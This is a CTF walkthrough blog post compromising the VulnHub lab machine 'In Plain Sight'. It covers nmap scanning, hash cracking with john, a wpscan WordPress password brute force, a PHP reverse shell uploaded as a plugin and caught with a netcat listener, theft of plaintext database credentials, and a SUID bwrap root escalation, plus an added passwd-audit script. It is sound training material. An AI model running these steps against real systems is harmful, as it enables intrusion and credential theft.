In Plain Sight: 1.0.1 walkthrough vulnhub

CTF | In Plain Sight: 1.0.1 vulnhub writeup

In this article, we solve another VulnHub CTF, In Plain Sight: 1. This virtual machine was created by bzyo, and its difficulty level is Beginner – Intermediate. The machine is hosted on VulnHub and can be downloaded from there.

Description

Built/Tested with VirtualBox. DHCP enabled. Need to get root to read flag

Network Scanning

First we perform an ARP scan with netdiscover to find the target IP address.

netdiscover

In my case, the target IP is 192.168.1.16. The next step is to scan the target's open ports and running services with this command:

nmap -A 192.168.1.16

The nmap output shows that ports 21 (FTP), 22 (SSH), and 80 (HTTP) are open on the target.

Enumeration

I open the browser, paste the target IP address into the URL bar, and see the Apache2 Ubuntu default page.

http://192.168.1.16

The landing page contains a hint: "You should replace the file (located at /var/www/html/index.htnl)". I open that URL in a new tab and see an image file. Clicking the image redirects to this URL:

http://192.168.1.16/index.htnl
/748AD6CCD32E4E52718445BB1CADC01EB08A0DF6

After enumerating the URL, I upload a PHP payload and see the message "File is not image".

So I create a file named urlhash, paste the hash from the URL into it, and brute-force it with john:

cat >urlhash
748AD6CCD32E4E52718445BB1CADC01EB08A0DF6

john --wordlist=/usr/share/wordlists/rockyou.txt urlhash

The hash is cracked and we see the message good luck. I upload a shell again and see the same message again. Reading the page source with Inspect Element, I find a base64-encoded comment.

http://192.168.1.16/748AD6CCD32E4E52718445BB1CADC01EB08A0DF6/upload.php

I copy the base64-encoded text, decode it with base64 -d, and find another WordPress URL.

echo "c28tZGV2LXdvcmRwcmVzcw==" |base64 -d

Without wasting time, I use the wpscan WordPress scanner to enumerate all users at the WordPress URL.

wpscan --url http://192.168.1.16/so-dev-wordpress -e u

WordPress Password Brute Force

Using this command, I brute-force the users we already found with wpscan:

wpscan --url http://192.168.1.16/so-dev-wordpress -U admin,mike -P /usr/share/wordlists/dirb/common.txt -t 100

After 40 seconds we have the password for the user admin. I log in to WordPress, go to the Plugins tab, and upload a PHP reverse shell there, then move on to the next step, ignoring the plugin error.

http://inplainsight/so-dev-wordpress/wp-admin/plugin-install.php

Then I go to the WordPress uploads directory and locate our reverse shell. Before calling the shell, I have already started our netcat listener.

http://inplainsight/so-dev-wordpress/wp-content/uploads/2020/03/shell.php

I get a netcat reverse shell on the target machine, but it is sh and many commands are restricted in this shell, so I spawn /bin/bash using python3:

nc -lvp 4545
python3 -c 'import pty;pty.spawn("/bin/bash")'

I land in the Apache public directory, where I find two WordPress accounts, so I move into the so-dev-wordpress directory.

Here we see the wp-config.php file, which contains the MySQL username and password in plain text. I copy the database username and password.

cd /var/www/html/so-dev-wordpress
cat wp-config.php |more

I connect to the database, query the sodevwp_users table, and find the hash for mike.

mysql -u sodevwp -p
use sodevwp;

select * from sodevwp_users;

I copy the hash, save it in a file named hash, and crack it with john:

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Privilege Escalation

Now that I have the password for the user mike, I switch from the www-data user to mike:

su mike
cat /etc/passwd |tail -n 3

ls -ls /etc/passwd

I find another flag: the password for the user joe in the /etc/passwd- file.

cat /etc/passwd- |tail -n 3

Using the cat command, we see the password for the user joe.

su joe

id
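
The /etc/passwd- step above is possible because a backup copy of the account file carried credential material that a low-privileged user could read. As an added example (not part of the original writeup), this audit flags passwd-format entries whose password field is not a placeholder; the function names and sample entries are constructed, and the sample assumes the field held a password hash.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit passwd-format files
# (/etc/passwd and backups such as /etc/passwd-) for exposed credentials.
# Function names are hypothetical; the sample entries below are constructed.

# Print "user:reason" for each entry whose password field is not a placeholder.
audit_passwd_file() {
    awk -F: '
        /^#/ || NF < 2            { next }   # skip comments and blank lines
        $2 == ""                  { print $1 ":empty-password"; next }
        $2 == "x" || $2 ~ /^[*!]/ { next }   # shadowed or locked account
                                  { print $1 ":embedded-hash" }
    ' "$1"
}

# Succeed when the "other" read bit is set on the file.
world_readable() {
    [ -n "$(find "$1" -prune -perm -004 2>/dev/null)" ]
}

# Report findings for one file; returns 1 if anything was flagged.
report_file() {
    findings=$(audit_passwd_file "$1")
    [ -z "$findings" ] && return 0
    if world_readable "$1"; then scope="world-readable"; else scope="restricted"; fi
    printf '%s\n' "$findings" | while IFS=: read -r user reason; do
        echo "$1 ($scope): $user has $reason"
    done
    return 1
}

# Constructed sample standing in for a leftover /etc/passwd- backup.
sample=$(mktemp)
cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
mike:x:1000:1000::/home/mike:/bin/bash
joe:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:1001:1001::/home/joe:/bin/bash
EOF
chmod 644 "$sample"
report_file "$sample" || echo "action: move hashes to /etc/shadow and restrict or remove the backup"
rm -f "$sample"
```

Pointing report_file at /etc/passwd and /etc/passwd- on a host runs the same check against the real files.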

I check for SUID binaries using the find command:

find / -type f -perm -u=s 2>/dev/null

I find an executable in /usr/bin called bwrap with the SUID bit set, so I run the command and get a root shell.

/usr/bin/bwrap
cd /root

ls

Reading the root flag using the cat command:

cat flag.txt

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
